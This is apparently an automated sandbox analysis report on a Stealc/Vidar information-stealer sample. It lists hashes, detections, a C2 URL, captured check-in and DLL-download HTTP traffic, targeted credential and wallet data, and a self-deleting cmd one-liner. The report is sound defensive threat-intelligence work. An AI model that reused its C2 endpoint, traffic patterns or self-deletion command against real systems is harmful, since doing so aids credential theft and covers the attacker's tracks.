Edit tour

Windows Analysis Report
B7VbZC8QLf.exe

Overview

General Information

Sample Name:	B7VbZC8QLf.exe
Original Sample Name:	763c3550f4e0a97baa4ebd6fc8c61996.exe
Analysis ID:	832130
MD5:	763c3550f4e0a97baa4ebd6fc8c61996
SHA1:	6bd5ad845b130d2e4ae6b8acc08d9d782cf1276a
SHA256:	b020c34a3b2b4bc4fbfa0ac4d3ca97283e2fdce71f737e1103bd638ed8f6647a
Tags:	32exeStealctrojan
Infos:

Detection

Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Stealc

Malicious sample detected (through community Yara rule)

Detected unpacking (overwrites its own PE header)

Yara detected Vidar stealer

Detected unpacking (changes PE section rights)

Snort IDS alert for network traffic

Tries to steal Mail credentials (via file / registry access)

Tries to steal Crypto Currency Wallets

Self deletion via cmd or bat file

Machine Learning detection for sample

Modifies existing user documents (likely ransomware behavior)

Found evasive API chain (may stop execution after checking locale)

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Found evasive API chain (date check)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Downloads executable code via HTTP

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

Contains functionality to read the PEB

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

B7VbZC8QLf.exe (PID: 2492 cmdline: C:\Users\user\Desktop\B7VbZC8QLf.exe MD5: 763C3550F4E0A97BAA4EBD6FC8C61996)

cmd.exe (PID: 5956 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\B7VbZC8QLf.exe" & del "C:\ProgramData\*.dll"" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 4332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

timeout.exe (PID: 6092 cmdline: timeout /t 5 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://asec.ahnlab.com/en/22932/ https://asec.ahnlab.com/en/30445/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://jerrysmith.online/410b5129171f10ea.php"}

Threatname: Vidar

{"C2 url": "http://jerrysmith.online/410b5129171f0ea.php"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.351788229.0000000000916000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x4aad:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.351693750.00000000008A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.352104857.00000000023F5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.351827343.0000000000972000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: B7VbZC8QLf.exe PID: 2492	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: B7VbZC8QLf.exe PID: 2492	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: B7VbZC8QLf.exe PID: 2492	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.B7VbZC8QLf.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.B7VbZC8QLf.exe.8a0e67.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.B7VbZC8QLf.exe.8a0e67.1.unpack	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x78246:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B

Snort Signatures

ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.5 - Destination IP: 85.31.45.22

Timestamp:	192.168.2.585.31.45.2249690802044243 03/22/23-11:21:17.410796
SID:	2044243
Source Port:	49690
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting browsers Config from C2 - Source IP: 192.168.2.5 - Destination IP: 85.31.45.22

Timestamp:	192.168.2.585.31.45.2249691802044244 03/22/23-11:21:17.890075
SID:	2044244
Source Port:	49691
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Stealc Requesting plugins Config from C2 - Source IP: 192.168.2.5 - Destination IP: 85.31.45.22

Timestamp:	192.168.2.585.31.45.2249692802044246 03/22/23-11:21:18.044660
SID:	2044246
Source Port:	49692
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 22 Mar 2023 10:21:18 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 0

Source: B7VbZC8QLf.exe, 00000000.00000002.351827343.0000000000972000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctlrysmith.online/410b5129171f10ea.php
Source: B7VbZC8QLf.exe, 00000000.00000002.352104857.00000000023F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jerrysmith.online
Source: B7VbZC8QLf.exe, 00000000.00000002.351827343.0000000000929000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jerrysmith.online/410b5129171f10ea.php
Source: B7VbZC8QLf.exe, 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://jerrysmith.online/410b5129171f10ea.phpcdac5200014617065a0ce8d9d8Unindexed
Source: B7VbZC8QLf.exe, 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://jerrysmith.online/410b5129171f10ea.phpcdac5200014617065a0ce8d9d8tions
Source: B7VbZC8QLf.exe, 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://jerrysmith.online/410b5129171f10ea.phper
Source: B7VbZC8QLf.exe, 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://jerrysmith.online/410b5129171f10ea.phpit.exe
Source: B7VbZC8QLf.exe, 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmp, B7VbZC8QLf.exe, 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://jerrysmith.online/410b5129171f10ea.phpn:
Source: B7VbZC8QLf.exe, 00000000.00000002.351827343.0000000000929000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jerrysmith.online/c043bcd0ba06ae1d/sqlite3.dll
Source: B7VbZC8QLf.exe, 00000000.00000002.352104857.00000000023F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://jerrysmith.online?
Source: B7VbZC8QLf.exe, 00000000.00000002.352330459.000000000305C000.00000004.00000020.00020000.00000000.sdmp, B7VbZC8QLf.exe, 00000000.00000002.354583978.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: CBAKJKJJ.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: CBAKJKJJ.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: CBAKJKJJ.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: B7VbZC8QLf.exe, 00000000.00000003.318405421.0000000009023000.00000004.00000020.00020000.00000000.sdmp, CBAKJKJJ.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: CBAKJKJJ.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: B7VbZC8QLf.exe, 00000000.00000003.318405421.0000000009023000.00000004.00000020.00020000.00000000.sdmp, CBAKJKJJ.0.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: B7VbZC8QLf.exe, 00000000.00000003.318405421.0000000009023000.00000004.00000020.00020000.00000000.sdmp, CBAKJKJJ.0.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: B7VbZC8QLf.exe, 00000000.00000003.318405421.0000000009023000.00000004.00000020.00020000.00000000.sdmp, CBAKJKJJ.0.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: B7VbZC8QLf.exe, 00000000.00000003.318405421.0000000009023000.00000004.00000020.00020000.00000000.sdmp, CBAKJKJJ.0.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: B7VbZC8QLf.exe, 00000000.00000003.318405421.0000000009023000.00000004.00000020.00020000.00000000.sdmp, CBAKJKJJ.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

HTTP traffic detected: POST /410b5129171f10ea.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEHDBAAECBFHJKFCFBFHost: jerrysmith.onlineContent-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 33 39 44 38 37 45 35 33 30 38 36 33 35 37 36 38 35 30 37 39 38 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 2d 2d 0d 0a Data Ascii: ------CAEHDBAAECBFHJKFCFBFContent-Disposition: form-data; name="hwid"F39D87E530863576850798------CAEHDBAAECBFHJKFCFBFContent-Disposition: form-data; name="build"default------CAEHDBAAECBFHJKFCFBF--

Source: unknown

DNS traffic detected: queries for: jerrysmith.online

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe

Code function: 0_2_00403657 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,

0_2_00403657

Source: global traffic

HTTP traffic detected: GET /c043bcd0ba06ae1d/sqlite3.dll HTTP/1.1Host: jerrysmith.onlineCache-Control: no-cache

Source: B7VbZC8QLf.exe, 00000000.00000002.351727380.000000000090A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	File deleted: C:\Users\user\Desktop\RAYHIWGKDI.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	File deleted: C:\Users\user\Desktop\RAYHIWGKDI.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	File deleted: C:\Users\user\Desktop\GAOBCVIQIJ.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	File deleted: C:\Users\user\Desktop\GAOBCVIQIJ.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	File deleted: C:\Users\user\Desktop\BPMLNOBVSB.docx	Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.B7VbZC8QLf.exe.8a0e67.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.351788229.0000000000916000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.351693750.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: B7VbZC8QLf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.B7VbZC8QLf.exe.8a0e67.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.351788229.0000000000916000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.351693750.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe

Code function: String function: 00402FD2 appears 335 times

Source: B7VbZC8QLf.exe, 00000000.00000000.307379403.00000000004C5000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamegunshot.exe6 vs B7VbZC8QLf.exe
Source: B7VbZC8QLf.exe	Binary or memory string: OriginalFilenamegunshot.exe6 vs B7VbZC8QLf.exe

Source: B7VbZC8QLf.exe	ReversingLabs: Detection: 29%
Source: B7VbZC8QLf.exe	Virustotal: Detection: 37%

Source: B7VbZC8QLf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\B7VbZC8QLf.exe C:\Users\user\Desktop\B7VbZC8QLf.exe
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\B7VbZC8QLf.exe" & del "C:\ProgramData\*.dll"" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\B7VbZC8QLf.exe" & del "C:\ProgramData\*.dll"" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5	Jump to behavior

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe

File created: C:\Users\user\Desktop\EFOYFBOLXA.docx

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@6/19@1/1

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: B7VbZC8QLf.exe, 00000000.00000002.352330459.000000000305C000.00000004.00000020.00020000.00000000.sdmp, B7VbZC8QLf.exe, 00000000.00000002.354555172.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: B7VbZC8QLf.exe, 00000000.00000002.352330459.000000000305C000.00000004.00000020.00020000.00000000.sdmp, B7VbZC8QLf.exe, 00000000.00000002.354555172.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: B7VbZC8QLf.exe, 00000000.00000002.352330459.000000000305C000.00000004.00000020.00020000.00000000.sdmp, B7VbZC8QLf.exe, 00000000.00000002.354555172.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: B7VbZC8QLf.exe, 00000000.00000002.352330459.000000000305C000.00000004.00000020.00020000.00000000.sdmp, B7VbZC8QLf.exe, 00000000.00000002.354555172.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: B7VbZC8QLf.exe, 00000000.00000002.352330459.000000000305C000.00000004.00000020.00020000.00000000.sdmp, B7VbZC8QLf.exe, 00000000.00000002.354555172.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: B7VbZC8QLf.exe, 00000000.00000002.352330459.000000000305C000.00000004.00000020.00020000.00000000.sdmp, B7VbZC8QLf.exe, 00000000.00000002.354555172.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: B7VbZC8QLf.exe, 00000000.00000002.352330459.000000000305C000.00000004.00000020.00020000.00000000.sdmp, B7VbZC8QLf.exe, 00000000.00000002.354555172.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: B7VbZC8QLf.exe, 00000000.00000003.316913393.000000000241B000.00000004.00000020.00020000.00000000.sdmp, KKJKKJJKJEGIECAKJJEB.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: B7VbZC8QLf.exe, 00000000.00000002.352330459.000000000305C000.00000004.00000020.00020000.00000000.sdmp, B7VbZC8QLf.exe, 00000000.00000002.354555172.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: B7VbZC8QLf.exe, 00000000.00000002.352330459.000000000305C000.00000004.00000020.00020000.00000000.sdmp, B7VbZC8QLf.exe, 00000000.00000002.354555172.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe

Code function: 0_2_0040D6D2 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,

0_2_0040D6D2

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4332:120:WilError_01

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe

Unpacked PE file: 0.2.B7VbZC8QLf.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe

Unpacked PE file: 0.2.B7VbZC8QLf.exe.400000.0.unpack .text:ER;.data:W;.nofi:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Source: B7VbZC8QLf.exe

Static PE information: section name: .nofi

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe

Code function: 0_2_0040DE01 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0040DE01

Hooking and other Techniques for Hiding and Protection

Self deletion via cmd or bat file

Source: C:\Users\user\Desktop\B7VbZC8QLf.exe	Process created: "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\B7VbZC8QLf.exe" & del "C:\ProgramData\*.dll"" & exit
